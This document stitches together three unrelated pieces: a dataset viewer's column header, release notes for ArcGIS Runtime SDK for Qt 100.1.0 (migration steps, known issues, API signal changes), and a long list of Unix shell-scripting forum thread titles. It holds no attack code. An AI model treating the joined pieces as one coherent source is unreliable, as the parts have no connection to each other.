text
stringlengths
454
608k
url
stringlengths
17
896
dump
stringclasses
91 values
source
stringclasses
1 value
word_count
int64
101
114k
flesch_reading_ease
float64
50
104
Version 100.1.0 of ArcGIS Runtime SDK for Qt, also known as Update1, is the first update to version 100.0. This topic describes what's new and changed in this release and provides a list of known issues. See Related Topics at the end of this topic for release notes for previous versions. API changes Due to a revamped architecture and improved API, changes are required to use projects that were built with version 10.2.6. SDK changes The following changes and enhancements have been added to the SDK to further enhance the developer experience and create a more Qt-like development environment. New SDK IDE integration process Previous versions of ArcGIS Runtime SDK for Qt made use of .prf files for setting up the various qmake variables, build options, and link options. These files were directly copied into the mkspecs/features folder of your Qt installation. In addition, QML plugins were directly copied into the Qt installation's qml folders. The copying was performed by the post installer app that automatically launches after the SDK setup process is complete. These copy steps were required so that Qt could have a reliable way of discovering the ArcGIS Runtime SDK for Qt on the development machine. This worked reliably, but had some drawbacks, such as making support for side by side installation and plugin revisions difficult. Starting with version 100.1, .prf files and QML plugins are no longer copied into the kits. Rather, the .prf files have been converted to pri files, so you can use the include() qmake function to include the ArcGIS Runtime SDK for Qt in your Qt apps. In addition, you should use the addImportPath() function to add the various QML plugins to the application engine's import path. If you create a new 100.1.0 template app, you can see this new workflow. In addition, this process is explained in detail in the Qt best practices topic of the guide. Migrating from 100.0 to 100.1 Due to the changes in the SDK IDE integration process described in the previous section, there are a few steps that must be done to upgrade from 100.0. The first step is to run the post installer app, which is in the tools folder of the SDK installation. When it runs, the post installer will notify you if 100.0 files are present in your Qt kit, and will offer to remove them for you. It is recommended that you accept this, as it will remove old 100.0 references from your Qt installation. Failing to do this step could result in unexpected issues when trying to use the newer version of the SDK. After this option is accepted, proceed with the rest of the post installer. Once complete, a few changes to your project's .pro and main.cpp file will need to be made. Those changes are described in the Qt best practices topic of the guide. Note: 100.1 supports revisions, meaning that you can install 100.1, and either import 100.1 or 100.0. You do not need to maintain separate installations of 100.0 and 100.1 on your development machine, as you can seamlessly switch between the new version and older versions with only the 100.1 installation. For this reason, it is recommended that when you want to begin migrating your apps from 100.0 to 100.1, to simply uninstall 100.0, install 100.1, and follow the above migration steps. If you must keep concurrent installations of 100.0 and 100.1 on your development machine, the post installer must be re-run each time you want to build your app for each version of the SDK to ensure that the proper version is picked up by Qt. New Sample Viewer The sample viewer is redesigned with a new UI that works well on all platforms and devices. It showcases some of the new capabilities of Qt Quick Controls 2 and also features many architectural improvements, which should improve quality and performance.. Maps, layers, and general - Enabling High DPI (Qt::AA_EnableHighDpiScaling) on Android is causing the MapView to scale up/down on high resolution devices. - Uninstall of one version of the API only (e.g. C++ or QML) is not currently supported. If you uninstall only one API you may still see QtCreator templates and documentation for this product. - The uninstaller on macOS may report that some files could not be removed when, in fact, they were removed. - Installing only the C++ API and not the QML API does not install the Toolkit. 3D - 3D military symbol text is sometimes clipped on Windows or macOS. They are not clipped in 2D. API changes since 100.0.0 There have been many additions to the API to support new capabilities. There was also a bit of rearranging. Here are some of those. - Version 100.1 introduces new internal changes for versioning to help make migrating from one version of ArcGIS Runtime to another easier for the future. While side-by-side installations are supported, you may run into some scenarios where the ArcGIS Runtime QML plugin import statement may not allow for you to import 100.1 when you also have 100.0 installed. This is because the qmlimportscanner can detect the version 100.0 plugin before the 100.1 plugin, causing 100.1 import statements to fail. If you want to migrate to version 100.1, you will need to go into your Qt kit, and navigate to the qml folder. Remove the Esri folder, and this should now be able to import either 100.0 or 100.1 without any further issues. This will only be an issue when version 100.0 is installed side-by-side with another version of ArcGIS Runtime. All future versions of ArcGIS Runtime versions will have a more seamless way of upgrading between releases. - The signatures of certain signals in the C++ API have been updated to include additional arguments. If you are already connecting to these signals using the newer Qt 5 syntax your code will still compile but you may wish to update the connection to include the additional parameters. If you are connecting using the older SIGNAL/SLOT syntax your code will still compile but the connection will be invalid - you should receive a warning message at run time. In this case, you must update your connection syntax. The affected signals are: - PortalGroup::fetchGroupUsersCompleted - PortalItem::addCommentCompleted - PortalItem::fetchCommentsCompleted - PortalItem::fetchGroupsCompleted - PortalItem::addRatingCompleted - PortalItem::shareWithGroupsCompleted - PortalItem::unshareGroupsCompleted - PortalUser::fetchContentCompleted - PortalUser::createFolderCompleted - C++ Model role enums have been moved. Now role enums no longer exist at the global Esri::ArcGISRuntime namespace level, but they are nested inside of their corresponding model class. So, any code referencing these roles may need to be updated to prefix the model class before the enum values. - The Toolkit's QML plugin path in the SDK setup does not match the GitHub repo. Therefore, when including the Toolkit PRI file (which only needs to be done for iOS with Qt 5.9), the path will need to be changed to reflect the differing folder names.
https://developers.arcgis.com/qt/latest/qml/guide/release-notes-100-1.htm
CC-MAIN-2019-26
refinedweb
1,195
66.64
Python - Search an element in the Linked List Searching an element in a linked list requires creating a temp node pointing to the head of the linked list. Along with this, two more variables are required to track search and track index of the current node. If the temp node is not null at the start, then traverse the linked list to check if current node value matches with the search value. If it matches then update search tracker variable and stop traversing the list, else keep on traversing the list. If the temp node is empty at the start, then the list contains no item. The function SearchElement is created for this purpose. It is a 4-step process. def SearchElement(self, searchValue): #1. create a temp node pointing to head temp = self.head #2. create two variables: found - to track # search, idx - to track current index found = 0 i = 0 #3. if the temp node is not null check the # node value with searchValue, if found # update variables and break the loop, else # continue searching till temp node is null if(temp != None): while (temp != None): i += 1 if(temp.data == searchValue): found += 1 break temp = temp.next if(found == 1): print(searchValue,"is found at index =", i) else: print(searchValue,"is not found in the list.") else: #4. If the temp node is null at the start, # the list is empty print("The list is empty.") The below is a complete program that uses above discussed concept to search an element in a given #Search an element def SearchElement(self, searchValue): temp = self.head found = 0 i = 0 if(temp != None): while (temp != None): i += 1 if(temp.data == searchValue): found += 1 break temp = temp.next if(found == 1): print(searchValue,"is found at index =", i) else: print(searchValue,"is not found in the list.") else: print("The list is empty.") #display the content of the list def PrintList(self): temp = self.head if(temp != None): print("The list contains:", end=" ") while (temp != None): print(temp.data, end=" ") temp = temp.next print() else: print("The list is empty.") # test the code MyList = LinkedList() #Add three elements at the end of the list. MyList.push_back(10) MyList.push_back(20) MyList.push_back(30) #traverse to display the content of the list. MyList.PrintList() #search for element in the list MyList.SearchElement(10) MyList.SearchElement(15) MyList.SearchElement(20) The above code will give the following output: The list contains: 10 20 30 10 is found at index = 1. 15 is not found in the list. 20 is found at index = 2.
https://www.alphacodingskills.com/python/ds/python-linked-list-search-an-element.php
CC-MAIN-2021-31
refinedweb
432
76.52
I have an array filled with Datetime objects: [Mon, 22 Jun 2015, Tue, 23 Jun 2015, Wed, 24 Jun 2015, Thu, 25 Jun 2015, Fri, 26 Jun 2015, Sat, 27 Jun 2015, Sun, 28 Jun 2015] I know how to select what I want from the array ex: week.select{|x|x.monday? || x.wednesday?} But now when I try to write a method to select days from the array, I can't seem to figure out how to pass these methods to the select statement: ex: def get_days(wkn, desired_days*) get_week = Model.week(2) get_days_of_week = get_week.select{|x|x.desired_day[monday]?|| x.desired_day[sunday]} end any ideas? desired_days would be a user saying that they want mon. and sun. so mon, sun will get passed in as desired_days the method will get a full week range and then I want select out the desired days. I would do: def get_days(wkn, *desired_days) get_week = Model.week(2) get_days_of_week = get_week.select { |x| desired_days.include? x.strftime("%A") } end
http://databasefaq.com/index.php/answer/1211/ruby-ruby-on-rails-4-get-x-days-out-of-an-array
CC-MAIN-2019-22
refinedweb
167
72.16
On Tue, Jan 05, 1999 at 10:57:16PM -0500, Benjamin Scherrey wrote:> Kurt -> > Thanx for the insightful information about the impact of changing the HZ> values. Questions: a) how platform specific is this setting (i86, ALPHA, et al),> and b) Does increasing the HZ value increases context switches or increases> duration of each context?a)The HZ value differs between the different architectures. The alpha has e.g.HZ set to 1024. That's why the kernel core has to independent of it.The way I coded it, it will break compilation on other archs, as I was tolazy to put the constant HZ_TO_STD into the header files of other archs.Of course, we could use something like #ifndef HZ_TO_STD #define HZ_TO_STD 1#endif in kernel/sys.cb)The timer interrupt and therefore the scheduler will be called more often.If more than one process competes for CPU (R state), than the number ofswitches between these processes will occur more often, about 4 times asoften.If I understood correctly, also the bottom half data processing of thekernel is tied to the timer interrupt and will thus happen more often.It speeded up some of my numerical computations on my SMP machine, BTW. Ihave rc5des runnning (idle priority, Rik's patch), and some threads sleepingand waiting for some job to be submitted to them. However, after they weresignalled, they will only start after the next scheduler tick. So the HZvalue influences scheduling latency. Unfortunately my program is not verywell parallelized, so the jobs to be done by the threads are very short andtake about the same time as the scheduler latency. Now, with 400 Hz it wasmuch better ...> This sounds like an excellent developer's config option to me.... Any> chance of this happening soon?This is not up to me. I can however create a cleaned up patch and put it on my website, if enoughpeople want it. It will take some days, though, as I'm very busy.Regards,--
https://lkml.org/lkml/1999/1/7/64
CC-MAIN-2017-13
refinedweb
331
65.62
My instructions were to write a program that displays the first 20 elements of the Fibonacci series, that begins with 0, 1, then the next numbers come from adding the preceeding two numbers. 0, 1, 1, 2, 3, 5, 8... Here is what I have so far: #include <stdio.h> int main(void) { int current, prev = 1, prevprev = 0; for (int i = 0; i < 20 i++) {current = prev + prevprev; printf(current + " "); prevprev = prev; prev = current; } println(); } } Do I have the right idea? Please help... Also part of my instructions (i'm not sure if how to do this part either) are that I only display 5 members of the series per line, then start a new line, and they must be dspaced neatly in 5 columns across the screen, and display some appropriate title...boy these instructors are neat freaks! thanks for you time and help, -James
http://cboard.cprogramming.com/c-programming/25260-fibonacci-numbers-please-help.html
CC-MAIN-2013-48
refinedweb
147
76.25
Hi Martin! First, some self-corrections.. :-) > > It seems like we really need some way to decode r_dev. One possible > > solutions are to implement major(), minor(), and makedev() somewhere. "solution is" > > Another solution, if r_dev's raw value has no obvious use, would be to This should be st_rdev. > > turn it into a two elements tuple like (major, minor). > I'd add a field r_dev_pair which splits this into major and minor. I > would not remove r_dev, since existing code may break. Isn't st_rdev being made available only in 2.3, trough stat attributes? > Notice that major, minor, and makedev is already available through > TYPES on many platforms, although this has the known limitations, and > is probably wrong for Linux at the moment. Indeed. Here's what's defined here: def major(dev): return ((int)(((dev) >> 8) & 0xff)) def minor(dev): return ((int)((dev) & 0xff)) def major(dev): return (((dev).__val[1] >> 8) & 0xff) def minor(dev): return ((dev).__val[1] & 0xff) def major(dev): return (((dev).__val[0] >> 8) & 0xff) def minor(dev): return ((dev).__val[0] & 0xff) -- Gustavo Niemeyer [ 2AAC 7928 0FBF 0299 5EB5 60E2 2253 B29A 6664 3A0C ]
https://mail.python.org/pipermail/python-dev/2002-June/025224.html
CC-MAIN-2019-22
refinedweb
191
68.57
I am working on a struts2 project. I have created url with in my project and have passed parameters using tags. My question is how do i read the parameter in the actions? also if do the same would i be able to see the parameters as query string. i ask because i am not able to and i saw it in one of the tutorials. Typically, you will interact with parameters in your actions by using fields on your actions, exposed by setters. Assume the following URL maps to my example Struts2 action: URL Action Code public class MyAction extends ActionSupport { private String firstName; public String execute() throws Exception { // do something here return SUCCESS; } public String getFirstName() { return firstName; } public void setFirstName(final String firstName) { this.firstName = firstName; } } JSP Using Struts tags: <s:property Using JSP EL/JSTL: ${action.firstName}
https://codedump.io/share/4X5YneJNin4i/1/how-to-access-url-parameters-in-struts2
CC-MAIN-2017-04
refinedweb
141
54.22
This is the mail archive of the libc-alpha@sourceware.org mailing list for the glibc project. "Carlos O'Donell" <carlos@redhat.com> writes: > OK for master with: And having waited a few days for other comments, too... Committed! Thanks to all for reviews! > - Review suggested text and accept or reject with rationale. Accepted. Thanks! > - Fix error string typo in run_command_array. Fixed. > - Delete #if 0/#endif iconv/gconv code. Deleted. > - Successful build-many-glibcs run. That took a while (because b-m-g takes a long time), and needed some minor tweaks to handle the bootstrap step in build-many-glibcs. Successful run with x86-linux and i686-hurd. The Hurd maintainer will need to provide suitable magic to containerize a test, later :-)
https://sourceware.org/legacy-ml/libc-alpha/2018-08/msg00489.html
CC-MAIN-2021-04
refinedweb
123
70.9
Programming Chapter 4 Latest revision as of 20:45, 10 January 2012 [edit] Enum-ination Lets start out by creating a new scene, "Example-4", along with a new asset folder, "Example-4 Assets", move the scene into the folder, repeat, lather, rinse. OK, onto enumerations. Enumerations are custom data types with a predefined set of values. Lets create a new file and call it "Weather" and add an enumeration with the name Temperatures like this: using UnityEngine; using System.Collections; public class Weather : MonoBehaviour { public enum Temperatures { Unknown, Freezing, Cold, Mild, Warm, Hot } public Temperatures temperature = Temperatures.Unknown; protected void Update() { } protected void OnGUI() { } } Here we've created a type called Temperatures and created a variable setting it's initial value to Unknown from the Temperatures type. The value of our variable can only be one of the Temperatures. Now create an empty game object and attach this weather script to it. Go to the inspector and... we get a dropdown list with only these items. [edit] Help Me Doc Now we're going to modify the previous example slowly but surely throughout the chapter, but first lets get a little more knowledgeable about Unity and our custom script. Lets break it apart in small steps: Import the namespaces using UnityEngine; using System.Collections; Here we import the UnityEngine namespace and System.Collections namespace, which gives us: Declare class and inherit from MonoBehaviour, and an enum public class Weather : MonoBehaviour { public enum Temperatures { Unknown, Freezing, Cold, Mild, Warm, Hot } public Temperatures temperature = Temperatures.Unknown; ... } Our own custom weather class with a custom enumeration called Temperature. We also created a variable and set the initial value. Methods protected void Update() { } protected void OnGUI() { } We have two methods... which are actually inherited from MonoBehaviour. We'll come back to inheriting functions later. For now, go check the documentation and you should see a section with Overridable Functions which contains "Update" and "OnGUI". If you read the descriptions it says that Update is called every frame, if the MonoBehaviour is enabled. And OnGUI says it is called for rendering and handling GUI events. OK, so let's play a little more. Add the following: public float temperatureDegrees = 39.0f; protected void Update() { temperatureDegrees++; } protected void OnGUI() { GUILayout.Label(temperature.ToString() + " " + temperatureDegrees.ToString() + "F"); } Run it and you should see the string "Unknown" on the screen with a fast rising temperature. Update is being called every frame so every second our degree changes quite a bit (depending on our Frames Per Second). Now if you look at the documentation for Update, then see that it says the function is only called if the Behaviour is enabled. Clicking on Behaviour shows under the Variables section, there is one called enabled. Click it and it says it is a bool type (javascript is var name : type). So being the resourceful people that we are, lets modify our Weather.cs file and disable it after one run as follows: protected void Update() { temperatureDegrees++; enabled = false; } Run and... oh crickey! Note that we didn't have to declare the variable enabled, that's done in the parent class. But notice that it disables pretty much our whole script, the OnGUI doesn't run either since we disabled our Behaviour. This is useful, but not what we want for now. Seems we need more control. [edit] Select Your Path The if statement is similar to the ternary operator as it tests a condition, but instead of returning a result it executes the next statement if it evaluates to true (so if you use a block { } you can execute multiple statements). else if can be used to test more conditions before using an else which is a catch all to execute if all the if statements were false. Lets make a little something interactive to our Weather.cs file: protected void Update() { if(temperatureDegrees > 100.0f) { temperature = Temperatures.Hot; } else if(temperatureDegrees > 70.0f) { temperature = Temperatures.Warm; } else if(temperatureDegrees > 50.0f) { temperature = Temperatures.Mild; } else if(temperatureDegrees > 32.0f) { temperature = Temperatures.Cold; } else { temperature = Temperatures.Freezing; } } protected void OnGUI() { GUILayout.Label(temperature.ToString() + " " + temperatureDegrees.ToString() + "F"); if(GUILayout.Button("Warmer")) { temperatureDegrees += 5; } if(GUILayout.Button("Colder")) { temperatureDegrees -= 5; } } "if" works in sequence. So the first if will be checked to see if it evaluates to true, and if true it goes into the block statement following the if while the rest of the statements are ignored. So in this case the first statement evaluates to false as temperatureDegrees is less than 60, so it skips to the next statement. The second statement "else if..." evaluates to false as well and so on until we get to the if with > 32.0f, which evaluates to true. So the temperature "Cold" will be put into our temperature variable. Everything after that doesn't get evaluated as we already have a true statement. [edit] Iterate Iterate Iterate... The For loop is an iteration loop that allows you to repeat a statement over and over a certain number of times. You can throw this code in at the bottom of your OnGUI method: int sum = 0; for(int i=0; i<10; i++) { sum += i; } GUILayout.Label(sum.ToString()); At the end of this loop the value of sum will be 45 (0+1+2+3+4+5+6+7+8+9). There are three statements required by a for loop (reminder, statements are separated by a semi-colon): - The initial value, in this case it is i=0 (you can initialize variable earlier). - The condition to continue the loop, in this case while i<10 we continue. - The step the index takes, in this case increase i by 1 i++ (you can also do decrease). But be careful of a never ending loop (it just keeps going, and going, and going...) int i; // i will always be less than 10 (theoretically), since we just keep decreasing it's value for(i=0; i<10; i--) { GUILayout.Label("This is the song that never ends, it just goes on and on my friend..."); } [edit] Jump n' There are two main jump statements: - continue: jump back to the control statement. - break: break out of the control statement. Now lets replace our previous loop we created with this one: int sum = 0; int i; for(i=0; i<20; i++) { // if i is 5 then don't add to sum if(i>4 && i<6) continue; // if i is 9 quit this loop if(i>9) break; sum += i; } GUILayout.Label(sum.ToString()); In this example sum will be 40 (0+1+2+3+4+6+7+8+9) since we skipped 5 and quit when i got to 10. [edit] Recap - enum is the keyword used to create an enumeration type. - The values for an enum are comma separated and enclosed in a block { } - The Update and OnGUI methods are inherited from MonoBehaviour - enabled is a bool value which enables or disables our script - The if statement executes the code in it's block if it evaluates to true, otherwise it falls to the next block which can be if else or else if one exists. - The for statement executes the code in it's block the specified number of times until the condition is met. Programming Index : Previous Chapter : Next Chapter
http://wiki.unity3d.com/index.php?title=Programming_Chapter_4&diff=13064&oldid=4696
CC-MAIN-2020-24
refinedweb
1,219
56.66
What’s This Module For? To interact with a queue broker implementing version 0.8 of the Advanced Message Queueing Protocol (AMQP) standard. Copies of various versions of the specification can be found here. At time of writing, 0.10 is the latest version of the spec, but it seems that many popular implementations used in production environments today are still using 0.8, presumably awaiting a finalization of v.1.0 of the spec, which is a work in progress. What is AMQP? AMQP is a queuing/messaging protocol that is implemented by server daemons (called ‘brokers’) like RabbitMQ, ActiveMQ, Apache Qpid, Red Hat Enterprise MRG, and OpenAMQ. Though messaging protocols used in the enterprise are historically proprietary, AMQP has a bold and vocal stance that AMQP will be: - Broadly applicable for enterprise use - Totally open - Platform agnostic - Interoperable The working group consists of several huge enterprises who have a vested interest in a protocol that meets these requirements. Most are either huge enterprises who are (or were) a victim of the proprietary lock-in that came with what will now likely become ‘legacy’ protocols, or implementers of the protocols, who will sell products and services around their implementation. Here’s a brief list of those involved in the AMQP working group: - JPMorgan Chase (the initial developers of the protocol, along with iMatix) - Goldman Sachs - Red Hat Software - Cisco Systems - Novell Message brokers can facilitate an awfully large amount of flexibility in an architecture. They can be used to integrate applications across platforms and languages, enable asynchronous operations for web front ends, modularize and more easily distribute complex processing operations. Basic Publishing The first thing to know is that when you code against an AMQP broker, you’re dealing with a hierarchy: a ‘vhost’ contains one or more ‘exchanges’ which themselves can be bound to one or more ‘queues’. Here’s how you can programmatically create an exchange and queue, bind them together, and publish a message: from amqplib import client_0_8 as amqp conn = amqp.Connection(userid='guest', password='guest', host='localhost', virtual_host='/', ssl=False) # Create a channel object, queue, exchange, and binding. chan = conn.channel() chan.queue_declare('myqueue', durable=True) chan.exchange_declare('myexchange', type='direct', durable=True) chan.queue_bind('myqueue', 'myexchange', routing_key='myq.myx') # Create an AMQP message object msg = amqp.Message('This is a test message') chan.basic_publish(msg, 'myexchange', 'myq.myx') As far as we know, we have one exchange and one queue on our server right now, and if that’s the case, then technically the routing key I’ve used isn’t required. However, I strongly suggest that you always use a routing key to avoid really odd (and implementation-specific) behavior like getting multiple copies of a message on the consumer side of the equation, or getting odd exceptions from the server. The routing key can be arbitrary text like I’ve used above, or you can use a common formula of using ‘.’ as your routing key. Just remember that without the routing key, the minute more than one queue is bound to an exchange, the exchange has no way of knowing which queue to route a message to. Remeber: you don’t publish to a queue, you publish to an exchange and tell it which queue it goes in via the routing key. Basic Consumption Now that we’ve published a message, how do we get our hands on it? There are two methods: basic_get, which will ‘get’ a single message from the queue, or ‘basic_consume’, which technically doesn’t get *any* messages: it registers a handler with the server and tells it to send messages along as they arrive, which is great for high-volume messaging operations. Here’s the ‘basic_get’ version of a client to grab the message we just published: msg = chan.basic_get(queue='myqueue', no_ack=False) chan.basic_ack(msg.delivery_tag) In the above, I’ve used the same channel I used to publish the message to get it back again using the basic_get operation. I then acknowledged receipt of the message by sending the server a ‘basic_ack’, passing along the delivery_tag the server included as part of the incoming message. Consuming Mass Quantities Using basic_consume takes a little more thought than basic_get, because basic_consume does nothing more than register a method with the server to tell it to start sending messages down the pipe. Once that’s done, however, it’s up to you to do a chan.wait() to wait for messages to show up, and find some elegant way of breaking out of this wait() operation. I’ve seen and used different techniques myself, and the right thing will depend on the application. The basic_consume method also requires a callback method which is called for each incoming message, and is passed the amqp.Message object when it arrives. Here’s a bit of code that defines a callback method, calls basic_consume, and does a chan.wait(): consumer_tag = 'foo' def process(msg): txt = msg.body if '-1' in txt: print 'Got -1' chan.basic_cancel(consumer_tag) chan.close() else: print 'Got message!' chan.basic_consume('messages', callback=process, consumer_tag=consumer_tag) while True: print 'Message processed. Next?' try: chan.wait() except IOError as out: print "Got an IOError: %s" % out break if not chan.is_open: print "Done processing. Later" break So, basic_consume tells the server ‘Start sending any and all messages!’. The server registers a method with a name given by the consumer_tag argument, or it assigns one and it becomes the return value of basic_consume(). I define one here because I don’t want to run into race conditions where I want to call basic_cancel() with a consumer_tag variable that doesn’t exist yet, or is out of scope, or whatever. In the callback, I look for a sentinel message whose body contains ‘-1’, and at that point I call basic_cancel (passing in the consumer_tag so the server knows who to stop sending messages to), and I close the channel. In the ‘while True’, the channel object checks its status and exits if it’s not open. The above example starts to uncover some issues with py-amqplib. It’s not clear how errors coming back from the server are handled, as opposed to errors caused by the processing code, for example. It’s also a little clumsy trying to determine the logic for breaking out of the loop. In this case there’s a sentinel message sent to the queue representing the final message on the stack, at which point our ‘process()’ callback closes the channel, but then the channel has to check its own status to move forward. Just returning False from process() doesn’t break out of the while loop, because it’s not looking for a return value from that function. We could have our process() function raise an error of its own as well, which might be a bit more elegant, if also a bit more work. Moving Ahead What I’ve covered here actually covers perhaps 90% of the common cases for amqplib, but there’s plenty more you can do with it. There are various exchange types, including fanout exchanges and topic exchanges, which can facilitate more interesting messaging and pub/sub models. To learn more about them, here are a couple of places to go for information: Broadcasting your logs with RabbitMQ and Python Rabbits and Warrens RabbitMQ FAQ section “Messaging Concepts: Exchanges
http://protocolostomy.com/2010/04/03/pytpmotw-py-amqplib/
CC-MAIN-2022-27
refinedweb
1,232
61.16
- find grep and list file name - Convert Epoch time format to normal date time format in the same file - SSH FTP Issue - Help with Script: If diff between files is nothing then set a variable - Parsing /proc/net/dev into key:value pairs (self-answered) - How to search (grep?) filename for a string and if it contains this then... - Specifying and replacing fields with awk - Help with awk script, changing the FS for a single variable - Problem in shell script - Script is hanging - Ignore identical lines - awk help needed - Script help needed - Verifying SSH connectivity in a script - How to Strip lines off Streamed EDI Output - Terminal to the front no matter what - Need help with writing a perl script - unix shell script reqd... - Unix shell script - decimal output "bc not working" - About \ (Back slash) - Solaris request script - ASCII Text formatting - is that possible to keep statements in any loop?? - passing password in shell script - AWK script - conditional extracting - read from a file to a list - Can't read the last line - Cut Command Help Please - Help with awk funcions - use several inputs as arguments in my script - Help with separating syslog messages. - Using sed to print from the bottom up? - Help with sed/substitution! - How to use sed to remove html tags including text between them - Search flat file and return 3 fields - appending a line to the end of several hundred files - Setting up cronjobs - Listing of all the files in the order of last update (including those in the subdiret - Problems with extracting information - how to update a file - how to make your bash script run on a machine with csh and bash - Send an e-mail using ksh - detecting the part of a filename - aborted due to compilation error - Merge text files while combining the multiple header/trailer records into one each. - How do I search first&second string & copy all content between them to other file? - lowercase basedir? get filename - Dont want to print double-quotes - Script behaves different when run from cron vs. manually - shell script problem - Compare two files and remove all the contents of one file from another - ZIP Problem - remove trailing spaces from a line - Locking a script - script for finding an error from a log file - Doubt on Array creation - HTML and Attachment - Perl or awk/egrep from big files?? - shell script to ftp a file - Allow only particular machines to access - parsing return from cal command - Passing a file handler and an array from Perl to Shell Script - SHELL SCRIPT error - RCS archive in /etc - Double while loop problem - check to see if a file is compressed before trying to compress - Help needed in shell scripting - bash shell to c shell - Simple grep Question - download files - How to create file in ksh scripting with permission(rw-rw-rw) - Create path which has length=1023. - sftp - how to write shell scrit which adds parameters to existing files - echo and then cp the missing files - Strange problem. - Excluding the records with data only occuring once in first column - Checking the directory and concatenate the data of all the log files in that dir - ~ expansion in printf - Convert Row Entries Into Column entries - Read Hostname and Return IP Address - Delete Blank Lines Between DHCP Host Blocks - arrays and while loops in bash - status bar in shell script or perl - running script in ftp session - echo missing files. - filtering one file based on results from other - Scripting related . - Display the day of the given date-ksh - Continue output redirection on the same line? - Shell script which runs sql script - arrays not printing properly in bash - proper date and concatenation for filename - stripping a variable down - Using obase, help! - parsing cal cmd - see if a file is open - Testing for empty file - ssh to another computer - Bash Trap Problem? - Bash problem - syntax error: `-a' unexpected operator/operand in IF - converting day to capital letter... - Automating slapconfig - Varying number of awk search strings - Problems comparing files - What is wrong with this code - help about user sorting - path of the running script - not waiting...why? - List of directories into a nested list - How do I cut out this field? - Delete lines between two patterns without deleting the second pattern - Help sorting .csv file - awk to print files in a dir between the given time stamp - extracting table with awk - Remove spaces before a delimiter - create an user in perl - Scripted passwd but it won't really be quiet! - replace comma(,) with Tab - SED Substitution - problem with "defaults write" - matching 2 exact fields - Moving msgs in pine - Merge 70 files into one data matrix - Problems in running a Perl script via cronjob - how to read the variable from config file - How to get a list of group members? - Inserting double quotes after third delimiter - sed script to generate hyperlinks refuses to work - How do I go about finding a value located in one file in another? - problem with if loop - getting error - please help - Bash equivalent of perl's pack function ? - AWK not processing BEGIN directive - file size comparision local file and remote file - renaming files, please help - is it hard to extract particular lines & strings from the files?? - how to convert value in a variable from upper case to lower case - printing in certain column based on some result - column to row convert - script - help - Grepping using multiple wildcards - How to run a set of commands through ssh - change awk string result to number - passing Argument - EXEC error - Automated script to SSH to another server - string manipulation in ksh - Why do we use sort before compare ? - help with removing files which are n days old - Extracting the Filename - geting the real path - test a script about mount points - How to remove certain lines in multiple txt files? - AWK - how to "cut" a variable? - get result from database into shell script - Run command on remote sever from script - Help with Perl Module - grep or sed patterns - How to parse the listing (ls -ltr) - SED Help - Data after a string in a file - how to send multiple files from the shell script - expand and uuencode... - Invoke Perl function from Bash ? - how to use exec command in C shell - make sure logged in as userx before continuing script - Problem with shell script - Error: 0403-057 - how to change shell from BASH to C - automate ftpget to multiple hosts - Storing information in arrays.... - move in ksh - arrays in bash - SSH through a script - How to replicated records using sed - ksh and getopts - Editing Binary Files in Unix - Compairson and merging of files. - K Shell evaluating value to a variable - replace a field in a CSV file - How to export a variable from a child process running in background to the parent - Calling Functions of Other K Shell Program - error while doing decimal comparision in shell - running a shell script from another - How to parse the given word - Reading a file having junk characters in perl - replace a word in a file only first 10 occurances - ignoring blank line in a file - Cut last Field - script to read a line with spaces bet " " and write to a file - Help me to do this - call shell script with named parameters - 4 column tsv file, output 1 specific column - Sed Question 1. (Don't quite know how to use sed! Thanks) - how to find pine messages - problem developing for or while loops with the cut command - Convert Epoch Time to Standard Date and Time & Vice Versa - sed delete lines containing text1 or text2 - how to find matching braces using sed or in shell script - C shell arrays - Adding a footer to a flat file - sorting from several files for a specific data - How do I write multiple variable syntax? - How can i extract month number ? - Should I use PERL or Shell scripting? - How to stop asking password while running shell script? - concatenating the filenames in a directory - how to make different two process - put value of multiple sql statements into unix variables - Display mutiple line in single line - Grep/awk not getting the message correctly - AWK alias with parameters - Awk reporting. Format the output with left justification for every feild - Expect passmass - split a variable into two - SED Substitution - Creation of directoryname with Max limit - some query to be clarified - AWK script to count and then replace - error while using export command - scripting help - grep with case or if else help - Read multiple arrays in mysql - Searching array of arrays in perl - how to use html tag in shell scripting - lint and CFLAGS - Telnet TLS check script - strange output - check if user has read permissions - syntax of c shell - dead simple bash script question - read several inputs and if none input set to 9999 - weird return code processing changes - Remove spaces from first field, and write entire contents into other text file - Awk: Can anyone tell me why this doesn't work? - Can we write SQL cursors from shell script - sed append "\n" to end of every line in file - sed of big html files - difference between .bat and .wsh formats - Script to monitor forum - running sh file from windows - how to change IFS in arrays - Error while using getpid() is shell script - Substitution using SED - awk/sed Command: To Parse Stament between 2 numbers - Finding larg number and add one - Extracting a part of XML File - Writing given value into a file in particular record and column - how can i calculate a file using awk - Perl System command calls to variable - substring from list of files? - script to compile all libraries and forms - Problem in getting the ps information with field separator - Removing all characters on and before specific point - help on a datatabase-like script - Shell script required to uncompress and untar files - can we use routines of datastage in unix script - Crontab help - .bashrc files modifying the PS1 variable? - Problem with find command. - throw a generic message upon error - SCP logfiles from one server to another server - Review the Shell Script - update a common file in different/remote servers - if loop not working in BASH shell - Count the Consecutive Occurance of "X" in awk - grep display word only - -exec argument - Help with getopt - network and broadcast address - summery calculation - summery calculation - Grep userids - Recursively hard linking files -- bonehead question - Print to Parent Directory - awk problem - problem with while loop in BASH shell - scripting for wvdial for dial-up - Parse an XML task list to create each task.xml file - Please, review script. - code migration - simple sh script question - Can any one share a unix script for validating the export of a mapping which is in XM - Date in Perl - creating an RCS archive in /etc - schedule tasks - db2 - Need your help - tcl - best way to reboot ? - disk usage - Write in file from awk - split monthly logfiles into daily logfiles - .mailrc question - blind search pattern with AWK - I am stuck in my script - Help with this code - New to scripts - Grep related thing - Grep All lines between 2 different patterns - Append line that does not contain pipe to it previous line - AWK\SED advice - Issue in mail sending process - Sed to grep only numbers in string - Changing directories using variables. - Sed Problem - Modulus operator - \r characters in the file - decimal calculation - URGENT grep question - Cutting columns starting at the end of each line... - Re-arrangement of data - How to remove a file with a particular pattern - Capturing the output from an exec command - Long running shell scripts shuts donw the machine! - Need help in creating 10,000 files in unix - using list only file - awk calculation problem - assigning a variable - passing multiple files as parameters - problem in reading a file - Re-formatting of data display - data break split - problem in if condition - Use sed or gsub command - View the Server Total Ram in GB - Check Word if exist on file or not - What am I doing wrong? - Problem with awk and if statement - Need Help with Sort Command - Check for a pattern - If File has been updated, do something?? - find 4 chars on 2nd line, 44 chars over - Row to column converter using Awk or grep? - Prefix a string to the contents of a file - Locate file and path - Kron Shell: deleting all but most recent log files - whois scripting - differences in calling another script inside script - SFTP / UNZIP script issues - Sed command to find, manipulate and replace a number - Tricky array substitution in functions - Removing spaces from data - What does kill $! do? - crontab test argument expected - SFTP failure from unix to windows server 